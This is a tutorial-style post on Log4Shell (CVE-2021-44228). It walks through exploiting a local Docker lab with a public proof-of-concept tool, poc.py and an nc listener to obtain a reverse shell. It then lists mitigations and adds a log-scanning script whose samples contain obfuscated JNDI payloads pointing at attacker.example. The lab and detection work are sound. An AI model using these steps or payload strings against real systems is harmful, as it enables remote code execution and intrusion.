Exploit the Log4J Vulnerability – CVE-2021-44228

Image Source: https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html

The Log4j vulnerability is a critical remote code execution (RCE) vulnerability in the Apache Log4j logging library. It was first disclosed on December 9, 2021, and is considered to be one of the most serious software vulnerabilities ever discovered.

The vulnerability exists in the way that Log4j processes certain types of log messages. An attacker can exploit this vulnerability by sending a specially crafted log message to a vulnerable system. This message can then be used to execute arbitrary code on the system.

The Log4j vulnerability affects a wide range of software, including many popular applications and services. Some of the known victims of the vulnerability include Minecraft, Amazon Web Services, Cisco, and VMware.

Requirements

– Exploit tool (https://github.com/kozmer/log4j-shell-poc)
– Vulnerable JDK version
– Victim endpoint
– Attacker endpoint (optional)

Now let's build a PoC of how this vulnerability is exploited.

Download the tool

Bash
git clone https://github.com/kozmer/log4j-shell-poc

Then install the dependencies listed in requirements.txt:

Bash
pip install -r requirements.txt

Let's install Docker so we can fetch the vulnerable application.

Bash
sudo snap install docker

Now go into the folder of the exploit tool we downloaded and fetch the vulnerable Docker image.

Let's check the Docker images.

Let's run the image to get the vulnerable application up and running.

Bash
docker run --network host log4j-shell-poc

Then open localhost:8080 and confirm that the application is up.

Now let's download an older JDK version; I will use jdk-8u20-linux.

Move the JDK archive into the exploit tool's folder.

Bash
mv jdk-8u20-linux-x64.tar.gz /home/ali/Desktop/log4j-shell-poc-main

Then extract the tar file.

Bash
tar -xf jdk-8u20-linux-x64.tar.gz

Now run the poc.py script with the necessary parameters.

Bash
python3 poc.py --userip localhost --webport 8000 --lport 9001

Let's paste the line printed by the script into the login form of the application running on localhost.

Before clicking the Login button, start the listener.

Bash
nc -lvnp 9001

Then, when we click the Login button, we obtain a reverse shell.

How to Protect Against the Log4j Vulnerability?

  • Upgrade to the latest version of Log4j. The vulnerability has been patched in Log4j version 2.15.0 and later, so upgrading to the latest version is the best way to protect yourself.
  • Disable JNDI lookups. If you are unable to upgrade to the latest version of Log4j, you can disable JNDI lookups in your Log4j configuration. This will prevent attackers from exploiting the vulnerability.
  • Implement a web application firewall (WAF). A WAF can be used to block malicious requests that are trying to exploit the Log4j vulnerability.
  • Monitor your systems for suspicious activity. Even if you have taken all of the above steps, it is still important to monitor your systems for suspicious activity. This will help you to detect and respond to any attacks that may occur.
  • Identify affected systems. Determine which of your systems use Log4j. This may include web applications, server applications, and any software relying on Log4j for logging.
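The last two points (monitoring for suspicious activity and identifying affected systems) are easier to act on with something concrete. The following is an added example written for this post, not code from the original article or from the log4j-shell-poc project. It scans web-server access log lines for Log4j lookup strings, first collapsing the nested `${lower:...}`, `${upper:...}` and `${name:-default}` forms that attackers use to hide the `${jndi:` prefix from naive string matching (these three lookup forms are real Log4j 2 features), and it checks a Log4j 2 version string against the 2.15.0 figure cited above. The sample log lines, the host names `attacker.example` and all function names are constructed for this example.

```python
import re

# Innermost ${...} lookup: a body that contains no further '${' or '}'.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation: a JNDI lookup and the protocol scheme it targets.
_JNDI = re.compile(r"\$\{jndi:\s*([a-z]+)", re.IGNORECASE)


def _resolve(body: str) -> str:
    """Evaluate one obfuscation-only lookup body (text between '${' and '}').

    Real Log4j 2 lookup syntax handled here:
      ${name:-default}  -> "default" when "name" is unset (attackers write ${::-j})
      ${lower:TEXT}     -> "text"
      ${upper:text}     -> "TEXT"
    Any other lookup (jndi:, env:, date:, ...) is returned unchanged so it stays visible.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    if ":" in body:
        name, arg = body.split(":", 1)
        name = name.strip().lower()
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
    return "${" + body + "}"


def normalize_lookups(text: str, max_passes: int = 10) -> str:
    """Collapse nested lower/upper/default-value lookups, innermost first,
    until nothing changes or the pass limit is hit (guards against pathological input)."""
    for _ in range(max_passes):
        new = _INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan_log_lines(lines):
    """Return one finding per line that carries a JNDI lookup, obfuscated or not."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize_lookups(raw)
        match = _JNDI.search(normalized)
        if match:
            findings.append({
                "line": number,
                "scheme": match.group(1).lower(),   # ldap, ldaps, rmi, dns, ...
                "obfuscated": normalized != raw,    # True when nesting hid the prefix
            })
    return findings


def version_is_vulnerable(version: str, fixed=(2, 15, 0)) -> bool:
    """True when a Log4j 2.x version string is below the fixed release.
    2.15.0 is the release cited in this post; pass a newer tuple to raise the bar."""
    parts = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    parts = parts + (0,) * (3 - len(parts))
    return parts < fixed


# Constructed sample access log (hypothetical hosts; not taken from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "POST /login HTTP/1.1" 302 0 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 64 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Dec/2021:10:00:05 +0000] "GET /login?user=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/x} HTTP/1.1" 400 0 "-" "-"',
]


def run_sample():
    """Scan the constructed sample; lines 2, 3 and 5 should be reported."""
    return scan_log_lines(SAMPLE_LOG)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
    for v in ("2.14.1", "2.15.0", "2.17.1"):
        print(v, "vulnerable" if version_is_vulnerable(v) else "not vulnerable")
```

Two practical notes on the "disable JNDI lookups" bullet: on Log4j 2.10 through 2.14.1 the documented switch is the `log4j2.formatMsgNoLookups=true` system property (or the `LOG4J_FORMAT_MSG_NO_LOOKUPS` environment variable), and for any 2.x version the class-removal mitigation is to delete `org/apache/logging/log4j/core/lookup/JndiLookup.class` from the log4j-core jar. Apache also shipped 2.16.0 and the 2.17.x releases for follow-on issues after 2.15.0, so compare installed versions against the current release rather than only the minimum above.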
